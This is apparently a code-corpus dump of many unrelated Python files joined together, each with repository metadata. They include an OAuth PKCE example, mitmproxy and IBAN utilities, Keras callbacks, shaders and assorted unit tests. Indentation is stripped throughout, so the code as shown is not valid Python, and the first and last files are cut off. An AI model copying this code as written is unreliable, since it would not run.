seed = 1
rounds = 1+dlen/2
retval = "x"
for i in range(rounds):
if i+1<rounds or dlen % 2:
idx0 = (((digest[2*i] >> 6) & 3) + seed) % 6
idx1 = (digest[2*i] >> 2) & 15;
idx2 = ((digest[2*i] & 3) + seed / 6) % 6;
retval += "%s%s%s" % (vowels[idx0], consonants[idx1], vowels[idx2])
if i+1 < rounds:
idx3 = (digest[2 * i + 1] >> 4) & 15;
idx4 = digest[2 * i + 1] & 15;
retval += "%s-%s" % (consonants[idx3], consonants[idx4])
seed = (seed * 5 + digest[2*i] * 7 +
digest[2*i+1]) % 36;
else:
idx0 = seed % 6;
idx1 = 16;
idx2 = seed / 6;
retval += "%s%s%s" % (vowels[idx0], consonants[idx1], vowels[idx2])
retval += "x"
return retval
def hexstring2string(s):
"""convert hex representation of digest back to raw digest"""
assert (len(s) % 2 == 0)
if s.startswith("0x") or s.startswith("0X"):
s = s[2:]
return "".join([chr(eval("0x%s" % s[i:i+2])) for i in range(0, len(s), 2)])
def _test():
tests = """432cc46b5c67c9adaabdcc6c69e23d6d xibod-sycik-rilak-lydap-tipur-tifyk-sipuv-dazok-tixox
5a1edbe07020525fd28cba1ea3b76694 xikic-vikyv-besed-begyh-zagim-sevic-vomer-lunon-gexex
1c453603cdc914c1f2eeb1abddae2e03 xelag-hatyb-fafes-nehys-cysyv-vasop-rylop-vorab-fuxux
df8ec33d78ae78280e10873f5e58d5ad xulom-vebyf-tevyp-vevid-mufic-bucef-zylyh-mehyp-tuxax
02b682a73739a9fb062370eaa8bcaec9 xebir-kybyp-latif-napoz-ricid-fusiv-popir-soras-nixyx"""
# ...as computed by perl
tests = [x.split()[:2] for x in tests.split("\n")]
for digest, expected in tests:
res=bubblebabble(hexstring2string(digest))
print digest, res, ("failure", "ok")[expected==res]
if __name__=="__main__":
_test()
|
examples/python/sso/esi_oauth_native.py | Dusty-Meg/esi-docs | 130 | 31565 | <reponame>Dusty-Meg/esi-docs<gh_stars>100-1000
""" Python 3 native (desktop/mobile) OAuth 2.0 example.
This example can be run from the command line and will show you how the
OAuth 2.0 flow should be handled if you are a web based application.
Prerequisites:
* Create an SSO application at developers.eveonline.com with the scope
"esi-characters.read_blueprints.v1" and the callback URL
"https://localhost/callback/". Note: never use localhost as a callback
in released applications.
* Have a Python 3 environment available to you (possibly by using a
virtual environment: https://virtualenv.pypa.io/en/stable/).
* Run pip install -r requirements.txt with this directory as your root.
To run this example, make sure you have completed the prerequisites and then
run the following command from this directory as the root:
>>> python esi_oauth_native.py
then follow the prompts.
"""
import base64
import hashlib
import secrets
from shared_flow import print_auth_url
from shared_flow import send_token_request
from shared_flow import handle_sso_token_response
def main():
""" Takes you through a local example of the OAuth 2.0 native flow."""
print("This program will take you through an example OAuth 2.0 flow "
"that you should be using if you are building a desktop or mobile "
"application. Follow the prompts and enter the info asked for.")
# Generate the PKCE code challenge
random = base64.urlsafe_b64encode(secrets.token_bytes(32))
m = hashlib.sha256()
m.update(random)
d = m.digest()
code_challenge = base64.urlsafe_b64encode(d).decode().replace("=", "")
client_id = input("Copy your SSO application's client ID and enter it "
"here: ")
print("\nBecause this is a desktop/mobile application, you should use "
"the PKCE protocol when contacting the EVE SSO. In this case, that "
"means sending a base 64 encoded sha256 hashed 32 byte string "
"called a code challenge. This 32 byte string should be ephemeral "
"and never stored anywhere. The code challenge string generated for "
"this program is {} and the hashed code challenge is {}. \nNotice "
"that the query parameter of the following URL will contain this "
"code challenge.".format(random, code_challenge))
input("\nPress any key to continue:")
print_auth_url(client_id, code_challenge=code_challenge)
auth_code = input("Copy the \"code\" query parameter and enter it here: ")
code_verifier = random
form_values = {
"grant_type": "authorization_code",
"client_id": client_id,
"code": auth_code,
"code_verifier": code_verifier
}
print("\nBecause this is using PCKE protocol, your application never has "
"to share its secret key with the SSO. Instead, this next request "
"will send the base 64 encoded unhashed value of the code "
"challenge, called the code verifier, in the request body so EVE's "
"SSO knows your application was not tampered with since the start "
"of this process. The code verifier generated for this program is "
"{} derived from the raw string {}".format(code_verifier, random))
input("\nPress any key to continue:")
res = send_token_request(form_values)
handle_sso_token_response(res)
if __name__ == "__main__":
main()
|
examples/resourcetracking/client.py | brubbel/Pyro4 | 638 | 31567 | <filename>examples/resourcetracking/client.py
from __future__ import print_function
import sys
import random
import Pyro4
if sys.version_info < (3, 0):
input = raw_input
uri = input("Enter the URI of the server object: ")
with Pyro4.Proxy(uri) as proxy:
print("currently allocated resources:", proxy.list())
name1 = hex(random.randint(0, 999999))[-4:]
name2 = hex(random.randint(0, 999999))[-4:]
print("allocating resource...", name1)
proxy.allocate(name1)
print("allocating resource...", name2)
proxy.allocate(name2)
input("\nhit Enter now to continue normally or ^C/break to abort the connection forcefully:")
print("free resources normally...")
proxy.free(name1)
proxy.free(name2)
print("allocated resources:", proxy.list())
print("done.")
|
tests/unitary/ERC20CRV/test_setters.py | AqualisDAO/curve-dao-contracts | 217 | 31597 | import brownie
def test_set_minter_admin_only(accounts, token):
with brownie.reverts("dev: admin only"):
token.set_minter(accounts[2], {"from": accounts[1]})
def test_set_admin_admin_only(accounts, token):
with brownie.reverts("dev: admin only"):
token.set_admin(accounts[2], {"from": accounts[1]})
def test_set_name_admin_only(accounts, token):
with brownie.reverts("Only admin is allowed to change name"):
token.set_name("Foo Token", "FOO", {"from": accounts[1]})
def test_set_minter(accounts, token):
token.set_minter(accounts[1], {"from": accounts[0]})
assert token.minter() == accounts[1]
def test_set_admin(accounts, token):
token.set_admin(accounts[1], {"from": accounts[0]})
assert token.admin() == accounts[1]
def test_set_name(accounts, token):
token.set_name("Foo Token", "FOO", {"from": accounts[0]})
assert token.name() == "Foo Token"
assert token.symbol() == "FOO"
|
rurouni/exceptions.py | PinkDiamond1/Kenshin | 219 | 31601 | # coding: utf-8
class RurouniException(Exception):
pass
class ConfigException(RurouniException):
pass
class TokenBucketFull(RurouniException):
pass
class UnexpectedMetric(RurouniException):
pass |
release/stubs.min/System/Windows/Forms/__init___parts/ControlStyles.py | htlcnn/ironpython-stubs | 182 | 31611 | class ControlStyles(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies the style and behavior of a control.
enum (flags) ControlStyles,values: AllPaintingInWmPaint (8192),CacheText (16384),ContainerControl (1),DoubleBuffer (65536),EnableNotifyMessage (32768),FixedHeight (64),FixedWidth (32),Opaque (4),OptimizedDoubleBuffer (131072),ResizeRedraw (16),Selectable (512),StandardClick (256),StandardDoubleClick (4096),SupportsTransparentBackColor (2048),UserMouse (1024),UserPaint (2),UseTextForAccessibility (262144)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
AllPaintingInWmPaint=None
CacheText=None
ContainerControl=None
DoubleBuffer=None
EnableNotifyMessage=None
FixedHeight=None
FixedWidth=None
Opaque=None
OptimizedDoubleBuffer=None
ResizeRedraw=None
Selectable=None
StandardClick=None
StandardDoubleClick=None
SupportsTransparentBackColor=None
UserMouse=None
UserPaint=None
UseTextForAccessibility=None
value__=None
|
bin/award_ebadge_declare.py | ervikey/SA-ctf_scoreboard | 106 | 31633 | <filename>bin/award_ebadge_declare.py
# encode = utf-8
import os
import sys
import re
ta_name = 'SA-ctf_scoreboard'
ta_lib_name = 'sa_ctf_scoreboard'
pattern = re.compile(r"[\\/]etc[\\/]apps[\\/][^\\/]+[\\/]bin[\\/]?$")
new_paths = [path for path in sys.path if not pattern.search(path) or ta_name in path]
new_paths.insert(0, os.path.sep.join([os.path.dirname(__file__), ta_lib_name]))
sys.path = new_paths
|
seleniumwire/thirdparty/mitmproxy/net/http/multipart.py | KozminMoci/selenium-wire | 975 | 31641 | <reponame>KozminMoci/selenium-wire
import mimetypes
import re
from urllib.parse import quote
from seleniumwire.thirdparty.mitmproxy.net.http import headers
def encode(head, l):
k = head.get("content-type")
if k:
k = headers.parse_content_type(k)
if k is not None:
try:
boundary = k[2]["boundary"].encode("ascii")
boundary = quote(boundary)
except (KeyError, UnicodeError):
return b""
hdrs = []
for key, value in l:
file_type = mimetypes.guess_type(str(key))[0] or "text/plain; charset=utf-8"
if key:
hdrs.append(b"--%b" % boundary.encode('utf-8'))
disposition = b'form-data; name="%b"' % key
hdrs.append(b"Content-Disposition: %b" % disposition)
hdrs.append(b"Content-Type: %b" % file_type.encode('utf-8'))
hdrs.append(b'')
hdrs.append(value)
hdrs.append(b'')
if value is not None:
# If boundary is found in value then raise ValueError
if re.search(rb"^--%b$" % re.escape(boundary.encode('utf-8')), value):
raise ValueError(b"boundary found in encoded string")
hdrs.append(b"--%b--\r\n" % boundary.encode('utf-8'))
temp = b"\r\n".join(hdrs)
return temp
def decode(hdrs, content):
"""
Takes a multipart boundary encoded string and returns list of (key, value) tuples.
"""
v = hdrs.get("content-type")
if v:
v = headers.parse_content_type(v)
if not v:
return []
try:
boundary = v[2]["boundary"].encode("ascii")
except (KeyError, UnicodeError):
return []
rx = re.compile(br'\bname="([^"]+)"')
r = []
if content is not None:
for i in content.split(b"--" + boundary):
parts = i.splitlines()
if len(parts) > 1 and parts[0][0:2] != b"--":
match = rx.search(parts[1])
if match:
key = match.group(1)
value = b"".join(parts[3 + parts[2:].index(b""):])
r.append((key, value))
return r
return []
|
nlpaug/model/audio/normalization.py | techthiyanes/nlpaug | 3,121 | 31707 | import numpy as np
from nlpaug.model.audio import Audio
class Normalization(Audio):
def manipulate(self, data, method, start_pos, end_pos):
aug_data = data.copy()
if method == 'minmax':
new_data = self._min_max(aug_data[start_pos:end_pos])
elif method == 'max':
new_data = self._max(aug_data[start_pos:end_pos])
elif method == 'standard':
new_data = self._standard(aug_data[start_pos:end_pos])
aug_data[start_pos:end_pos] = new_data
return aug_data
def get_support_methods(self):
return ['minmax', 'max', 'standard']
def _standard(self, data):
return (data - np.mean(data)) / np.std(data)
def _max(self, data):
return data / np.amax(np.abs(data))
def _min_max(self, data):
lower = np.amin(np.abs(data))
return (data - lower) / (np.amax(np.abs(data)) - lower)
|
robogym/envs/rearrange/tests/test_object_creation.py | 0xflotus/robogym | 288 | 31766 | import numpy as np
from numpy.testing import assert_allclose
from robogym.envs.rearrange.common.utils import (
get_mesh_bounding_box,
make_block,
make_blocks_and_targets,
)
from robogym.envs.rearrange.simulation.composer import RandomMeshComposer
from robogym.mujoco.mujoco_xml import MujocoXML
def _get_default_xml():
xml_source = """
<mujoco>
<asset>
<material name="block_mat" specular="0" shininess="0.5" reflectance="0" rgba="1 0 0 1"></material>
</asset>
</mujoco>
"""
xml = MujocoXML.from_string(xml_source)
return xml
def test_mesh_composer():
for path in [
None,
RandomMeshComposer.GEOM_ASSET_PATH,
RandomMeshComposer.GEOM_ASSET_PATH,
]:
composer = RandomMeshComposer(mesh_path=path)
for num_geoms in range(1, 6):
xml = _get_default_xml()
composer.reset()
xml.append(composer.sample("object0", num_geoms, object_size=0.05))
sim = xml.build()
assert len(sim.model.geom_names) == num_geoms
pos, size = get_mesh_bounding_box(sim, "object0")
assert np.isclose(np.max(size), 0.05)
pos2, size2 = composer.get_bounding_box(sim, "object0")
assert np.allclose(pos, pos2)
assert np.allclose(size, size2)
def test_block_object():
xml = _get_default_xml()
xml.append(make_block("object0", object_size=np.ones(3) * 0.05))
sim = xml.build()
assert len(sim.model.geom_size) == 1
assert_allclose(sim.model.geom_size, 0.05)
def test_blocks_and_targets():
xml = _get_default_xml()
for obj_xml, target_xml in make_blocks_and_targets(num_objects=5, block_size=0.05):
xml.append(obj_xml)
xml.append(target_xml)
sim = xml.build()
assert len(sim.model.geom_size) == 10
assert_allclose(sim.model.geom_size, 0.05)
|
examples/tesselation.py | 2dx/moderngl | 916 | 31803 | <gh_stars>100-1000
#!/usr/bin/env python3
'''Simple example of using tesselation to render a cubic Bézier curve'''
import numpy as np
import moderngl
from ported._example import Example
class Tessellation(Example):
title = "Tessellation"
gl_version = (4, 0)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.prog = self.ctx.program(
vertex_shader='''
#version 400 core
in vec2 in_pos;
void main() { gl_Position = vec4(in_pos, 0.0, 1.0); }
''',
tess_control_shader='''
#version 400 core
layout(vertices = 4) out;
void main() {
// set tesselation levels, TODO compute dynamically
gl_TessLevelOuter[0] = 1;
gl_TessLevelOuter[1] = 32;
// pass through vertex positions
gl_out[gl_InvocationID].gl_Position = gl_in[gl_InvocationID].gl_Position;
}
''',
tess_evaluation_shader='''
#version 400 core
layout(isolines, fractional_even_spacing, ccw) in;
// compute a point on a bezier curve with the points p0, p1, p2, p3
// the parameter u is in [0, 1] and determines the position on the curve
vec3 bezier(float u, vec3 p0, vec3 p1, vec3 p2, vec3 p3) {
float B0 = (1.0 - u) * (1.0 - u) * (1.0 - u);
float B1 = 3.0 * (1.0 - u) * (1.0 - u) * u;
float B2 = 3.0 * (1.0 - u) * u * u;
float B3 = u * u * u;
return B0 * p0 + B1 * p1 + B2 * p2 + B3 * p3;
}
void main() {
float u = gl_TessCoord.x;
vec3 p0 = vec3(gl_in[0].gl_Position);
vec3 p1 = vec3(gl_in[1].gl_Position);
vec3 p2 = vec3(gl_in[2].gl_Position);
vec3 p3 = vec3(gl_in[3].gl_Position);
gl_Position = vec4(bezier(u, p0, p1, p2, p3), 1.0);
}
''',
fragment_shader='''
#version 400 core
out vec4 frag_color;
void main() { frag_color = vec4(1.0); }
'''
)
# four vertices define a cubic Bézier curve; has to match the shaders
self.ctx.patch_vertices = 4
self.ctx.line_width = 5.0
vertices = np.array([
[-1.0, 0.0],
[-0.5, 1.0],
[0.5, -1.0],
[1.0, 0.0],
])
vbo = self.ctx.buffer(vertices.astype('f4'))
self.vao = self.ctx.simple_vertex_array(self.prog, vbo, 'in_pos')
def render(self, time, frame_time):
self.ctx.clear(0.2, 0.4, 0.7)
self.vao.render(mode=moderngl.PATCHES)
if __name__ == '__main__':
Tessellation.run()
|
tests/techniques/test_train_policy_gradient.py | alphagamatoe/AlphaToe | 172 | 31852 | <filename>tests/techniques/test_train_policy_gradient.py
import functools
from unittest import TestCase
from common.base_game_spec import BaseGameSpec
from common.network_helpers import create_network
from games.tic_tac_toe import TicTacToeGameSpec
from games.tic_tac_toe_x import TicTacToeXGameSpec
from techniques.train_policy_gradient import train_policy_gradients
class _VerySimpleGameSpec(BaseGameSpec):
def new_board(self):
return [0, 0]
def apply_move(self, board_state, move, side):
board_state[move] = side
return board_state
def has_winner(self, board_state):
return board_state[0]
def __init__(self):
pass
def available_moves(self, board_state):
return [i for i, x in enumerate(board_state) if x == 0]
def board_dimensions(self):
return 2,
class TestTrainPolicyGradient(TestCase):
def test_learn_simple_game(self):
game_spec = _VerySimpleGameSpec()
create_model_func = functools.partial(create_network, 2, (4,))
variables, win_rate = train_policy_gradients(game_spec, create_model_func, None,
learn_rate=0.1,
number_of_games=1000, print_results_every=100,
batch_size=20,
randomize_first_player=False)
self.assertGreater(win_rate, 0.9)
def test_tic_tac_toe(self):
game_spec = TicTacToeGameSpec()
create_model_func = functools.partial(create_network, game_spec.board_squares(), (100, 100, 100,))
variables, win_rate = train_policy_gradients(game_spec, create_model_func, None,
learn_rate=1e-4,
number_of_games=60000,
print_results_every=1000,
batch_size=100,
randomize_first_player=False)
self.assertGreater(win_rate, 0.4)
|
sdk/python/core/tests/test_sanity_augmentation.py | YDK-Solutions/ydk | 125 | 31854 | # ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""
test_sanity_bundle_augmentation.py
Unittest for bundle augmentation.
"""
from __future__ import absolute_import
import sys
import unittest
from ydk.services import CRUDService
from ydk.providers import NetconfServiceProvider
from ydk.models.augmentation import ietf_aug_base_1
from ydk.models.augmentation import ietf_aug_base_2
from test_utils import assert_with_error
from test_utils import ParametrizedTestCase
from test_utils import get_device_info
class SanityYang(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.ncc = NetconfServiceProvider(
cls.hostname,
cls.username,
cls.password,
cls.port,
cls.protocol,
cls.on_demand,
cls.common_cache,
cls.timeout)
cls.crud = CRUDService()
def setUp(self):
self.crud.delete(self.ncc, ietf_aug_base_1.Cpython())
self.crud.delete(self.ncc, ietf_aug_base_2.Cpython())
def tearDown(self):
self.crud.delete(self.ncc, ietf_aug_base_1.Cpython())
self.crud.delete(self.ncc, ietf_aug_base_2.Cpython())
def test_aug_base_1(self):
cpython = ietf_aug_base_1.Cpython()
cpython.doc.ydktest_aug_1.aug_one = 'aug one'
cpython.doc.ydktest_aug_2.aug_two = 'aug two'
cpython.doc.ydktest_aug_4.aug_four = 'aug four'
cpython.lib.ydktest_aug_1.ydktest_aug_nested_1.aug_one = 'aug one'
cpython.lib.ydktest_aug_2.ydktest_aug_nested_2.aug_two = 'aug two'
cpython.lib.ydktest_aug_4.ydktest_aug_nested_4.aug_four = 'aug four'
cpython.doc.disutils.four_aug_list.enabled = True
item1 = cpython.doc.disutils.four_aug_list.Ldata()
item2 = cpython.doc.disutils.four_aug_list.Ldata()
item1.name, item1.number = 'one', 1
item2.name, item1.number = 'two', 2
self.crud.create(self.ncc, cpython)
cpython_read = self.crud.read(self.ncc, ietf_aug_base_1.Cpython())
self.assertEqual(cpython, cpython_read)
def test_aug_base_2(self):
cpython = ietf_aug_base_2.Cpython()
cpython.tools.aug_four = 'aug four'
self.crud.create(self.ncc, cpython)
cpython_read = self.crud.read(self.ncc, ietf_aug_base_2.Cpython())
self.assertEqual(cpython, cpython_read)
if __name__ == '__main__':
device, non_demand, common_cache, timeout = get_device_info()
suite = unittest.TestSuite()
suite.addTest(ParametrizedTestCase.parametrize(
SanityYang,
device=device,
non_demand=non_demand,
common_cache=common_cache,
timeout=timeout))
ret = not unittest.TextTestRunner(verbosity=2).run(suite).wasSuccessful()
sys.exit(ret)
|
getdata.py | krantirk/dash-120million-taxi-app | 103 | 31898 | <reponame>krantirk/dash-120million-taxi-app
import vaex
import os
# Open the main data
taxi_path = 's3://vaex/taxi/yellow_taxi_2012_zones.hdf5?anon=true'
# override the path, e.g. $ export TAXI_PATH=/data/taxi/yellow_taxi_2012_zones.hdf5
taxi_path = os.environ.get('TAXI_PATH', taxi_path)
df_original = vaex.open(taxi_path)
# Make sure the data is cached locally
used_columns = ['pickup_longitude',
'pickup_latitude',
'dropoff_longitude',
'dropoff_latitude',
'total_amount',
'trip_duration_min',
'trip_speed_mph',
'pickup_hour',
'pickup_day',
'dropoff_borough',
'dropoff_zone',
'pickup_borough',
'pickup_zone']
for col in used_columns:
print(f'Making sure column "{col}" is cached...')
df_original.nop(col, progress=True)
|
libs/validators/iban.py | Sparklingx/nzbhydra | 674 | 31904 | import re
from .utils import validator
regex = (
r'^[A-Z]{2}[0-9]{2}[A-Z0-9]{13,30}$'
)
pattern = re.compile(regex)
def char_value(char):
"""A=10, B=11, ..., Z=35
"""
if char.isdigit():
return int(char)
else:
return 10 + ord(char) - ord('A')
def modcheck(value):
"""Check if the value string passes the mod97-test.
"""
# move country code and check numbers to end
rearranged = value[4:] + value[:4]
# convert letters to numbers
converted = [char_value(char) for char in rearranged]
# interpret as integer
integerized = int(''.join([str(i) for i in converted]))
return (integerized % 97 == 1)
@validator
def iban(value):
"""
Return whether or not given value is a valid IBAN code.
If the value is a valid IBAN this function returns ``True``, otherwise
:class:`~validators.utils.ValidationFailure`.
Examples::
>>> iban('DE29100500001061045672')
True
>>> iban('123456')
ValidationFailure(func=iban, ...)
.. versionadded:: 0.8
:param value: IBAN string to validate
"""
return pattern.match(value) and modcheck(value)
|
examples/project-sourcecode/c.py | wheatdog/guildai | 694 | 31924 | <gh_stars>100-1000
from subproject import d
print("c")
|
tests/test_packages/test_skills/test_registration_aw1/test_behaviours.py | bryanchriswhite/agents-aea | 126 | 31967 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the behaviour classes of the registration_aw1 skill."""
import logging
from pathlib import Path
from unittest.mock import patch
from aea.helpers.transaction.base import RawMessage, Terms
from packages.fetchai.protocols.register.message import RegisterMessage
from packages.fetchai.protocols.signing.message import SigningMessage
from tests.conftest import ROOT_DIR
from tests.test_packages.test_skills.test_registration_aw1.intermediate_class import (
RegiatrationAW1TestCase,
)
class TestAW1Registration(RegiatrationAW1TestCase):
"""Test registration behaviour of registration_aw1."""
path_to_skill = Path(ROOT_DIR, "packages", "fetchai", "skills", "registration_aw1")
@classmethod
def setup(cls):
"""Setup the test class."""
super().setup()
def test_setup_i(self):
"""Test the setup method of the registration behaviour NOT developer_handle_mode and announce_termination_key is None."""
# setup
self.strategy.announce_termination_key = None
self.strategy.developer_handle_mode = False
# operation
with patch.object(self.logger, "log") as mock_logger:
self.register_behaviour.setup()
# after
self.assert_quantity_in_decision_making_queue(1)
message = self.get_message_from_decision_maker_inbox()
has_attributes, error_str = self.message_has_attributes(
actual_message=message,
message_type=SigningMessage,
performative=SigningMessage.Performative.SIGN_MESSAGE,
to=self.skill.skill_context.decision_maker_address,
sender=str(self.skill.skill_context.skill_id),
raw_message=RawMessage(
self.strategy.ledger_id, self.strategy.ethereum_address.encode("utf-8")
),
terms=Terms(
ledger_id=self.strategy.ledger_id,
sender_address="",
counterparty_address="",
amount_by_currency_id={},
quantities_by_good_id={},
nonce="",
),
)
assert has_attributes, error_str
mock_logger.assert_any_call(
logging.INFO, "sending signing_msg to decision maker..."
)
def test_setup_ii(self):
"""Test the setup method of the registration behaviour IN developer_handle_mode and announce_termination_key is NOT None."""
# setup
key = "some_key"
self.strategy.announce_termination_key = key
self.strategy.developer_handle_only = True
# operation
self.register_behaviour.setup()
# after
self.assert_quantity_in_decision_making_queue(0)
assert self.skill.skill_context.shared_state[key] is False
def test_act_i(self):
"""Test the act method of the registration behaviour where is_ready_to_register is False."""
# setup
self.strategy.is_ready_to_register = False
# operation
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
def test_act_ii(self):
"""Test the act method of the registration behaviour where aw1_registration_aeas is None."""
# setup
self.strategy.is_ready_to_register = True
# operation
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
def test_act_iii(self):
"""Test the act method of the registration behaviour where is_registered is True."""
# setup
self.strategy.is_ready_to_register = True
self.skill.skill_context.shared_state[
self.shared_storage_key
] = self.aw1_registration_aeas
self.strategy.is_registered = True
# operation
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
def test_act_iv(self):
"""Test the act method of the registration behaviour where is_registration_pending is True."""
# setup
self.strategy.is_ready_to_register = True
self.skill.skill_context.shared_state[
self.shared_storage_key
] = self.aw1_registration_aeas
self.strategy.is_registered = False
self.strategy.is_registration_pending = True
# operation
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
def test_act_v(self):
"""Test the act method of the registration behaviour where _register_for_aw1 is called."""
# setup
self.strategy.is_ready_to_register = True
self.skill.skill_context.shared_state[
self.shared_storage_key
] = self.aw1_registration_aeas
self.strategy.is_registered = False
self.strategy.is_registration_pending = False
# operation
with patch.object(self.logger, "log") as mock_logger:
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(len(self.aw1_registration_aeas))
assert self.strategy.is_registration_pending is True
# _register_for_aw1
info = self.strategy.registration_info
message = self.get_message_from_outbox()
has_attributes, error_str = self.message_has_attributes(
actual_message=message,
message_type=RegisterMessage,
performative=RegisterMessage.Performative.REGISTER,
to=self.aw1_registration_aea,
sender=self.skill.skill_context.agent_address,
info=info,
)
assert has_attributes, error_str
mock_logger.assert_any_call(
logging.INFO, f"sending registration info: {info}",
)
def test_act_vi(self):
"""Test the act method of the registration behaviour where aw1 agent is NOT in the whitelist."""
# setup
self.strategy.is_ready_to_register = True
self.skill.skill_context.shared_state[
self.shared_storage_key
] = self.aw1_registration_aeas
self.strategy.is_registered = False
self.strategy.is_registration_pending = False
self.strategy._whitelist = []
# operation
with patch.object(self.logger, "log") as mock_logger:
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
assert self.strategy.is_registration_pending is True
mock_logger.assert_any_call(
logging.INFO,
f"agent={self.aw1_registration_aea} not in whitelist={self.strategy._whitelist}",
)
def test_teardown(self):
"""Test the teardown method of the registration behaviour."""
assert self.register_behaviour.teardown() is None
self.assert_quantity_in_outbox(0)
|
mitmproxy/contentviews/auto.py | KarlParkinson/mitmproxy | 24,939 | 31981 | <filename>mitmproxy/contentviews/auto.py
from mitmproxy import contentviews
from . import base
class ViewAuto(base.View):
name = "Auto"
def __call__(self, data, **metadata):
# TODO: The auto view has little justification now that views implement render_priority,
# but we keep it around for now to not touch more parts.
priority, view = max(
(v.render_priority(data, **metadata), v)
for v in contentviews.views
)
if priority == 0 and not data:
return "No content", []
return view(data, **metadata)
def render_priority(self, data: bytes, **metadata) -> float:
return -1 # don't recurse.
|
official/utils/misc/keras_utils.py | baranshad/models | 180 | 32006 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helper functions for the Keras implementations of models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
from tensorflow.python.eager import profiler
class BatchTimestamp(object):
"""A structure to store batch time stamp."""
def __init__(self, batch_index, timestamp):
self.batch_index = batch_index
self.timestamp = timestamp
def __repr__(self):
return "'BatchTimestamp<batch_index: {}, timestamp: {}>'".format(
self.batch_index, self.timestamp)
class TimeHistory(tf.keras.callbacks.Callback):
"""Callback for Keras models."""
def __init__(self, batch_size, log_steps):
"""Callback for logging performance (# examples/second).
Args:
batch_size: Total batch size.
log_steps: Interval of time history logs.
"""
self.batch_size = batch_size
super(TimeHistory, self).__init__()
self.log_steps = log_steps
# Logs start of step 0 then end of each step based on log_steps interval.
self.timestamp_log = []
def on_train_begin(self, logs=None):
self.record_batch = True
def on_train_end(self, logs=None):
self.train_finish_time = time.time()
def on_batch_begin(self, batch, logs=None):
if self.record_batch:
timestamp = time.time()
self.start_time = timestamp
self.record_batch = False
if batch == 0:
self.timestamp_log.append(BatchTimestamp(batch, timestamp))
def on_batch_end(self, batch, logs=None):
if batch % self.log_steps == 0:
timestamp = time.time()
elapsed_time = timestamp - self.start_time
examples_per_second = (self.batch_size * self.log_steps) / elapsed_time
if batch != 0:
self.record_batch = True
self.timestamp_log.append(BatchTimestamp(batch, timestamp))
tf.compat.v1.logging.info(
"BenchmarkMetric: {'num_batches':%d, 'time_taken': %f,"
"'examples_per_second': %f}" %
(batch, elapsed_time, examples_per_second))
def get_profiler_callback(model_dir, profile_steps, enable_tensorboard):
"""Validate profile_steps flag value and return profiler callback."""
profile_steps_error_message = (
'profile_steps must be a comma separated pair of positive integers, '
'specifying the first and last steps to be profiled.'
)
try:
profile_steps = [int(i) for i in profile_steps.split(',')]
except ValueError:
raise ValueError(profile_steps_error_message)
if len(profile_steps) != 2:
raise ValueError(profile_steps_error_message)
start_step, stop_step = profile_steps
if start_step < 0 or start_step > stop_step:
raise ValueError(profile_steps_error_message)
if enable_tensorboard:
tf.compat.v1.logging.warn(
'Both TensorBoard and profiler callbacks are used. Note that the '
'TensorBoard callback profiles the 2nd step (unless otherwise '
'specified). Please make sure the steps profiled by the two callbacks '
'do not overlap.')
return ProfilerCallback(model_dir, start_step, stop_step)
class ProfilerCallback(tf.keras.callbacks.Callback):
"""Save profiles in specified step range to log directory."""
def __init__(self, log_dir, start_step, stop_step):
super(ProfilerCallback, self).__init__()
self.log_dir = log_dir
self.start_step = start_step
self.stop_step = stop_step
def on_batch_begin(self, batch, logs=None):
if batch == self.start_step:
profiler.start()
tf.compat.v1.logging.info('Profiler started at Step %s', self.start_step)
def on_batch_end(self, batch, logs=None):
if batch == self.stop_step:
results = profiler.stop()
profiler.save(self.log_dir, results)
tf.compat.v1.logging.info(
'Profiler saved profiles for steps between %s and %s to %s',
self.start_step, self.stop_step, self.log_dir)
|
examples/highcharts/pie-donut.py | Jbrunn/python-highcharts | 370 | 32045 | # -*- coding: utf-8 -*-
"""
Highcharts Demos
Donut chart: http://www.highcharts.com/demo/pie-donut
"""
from highcharts import Highchart
H = Highchart(width = 850, height = 400)
data = [{
'y': 55.11,
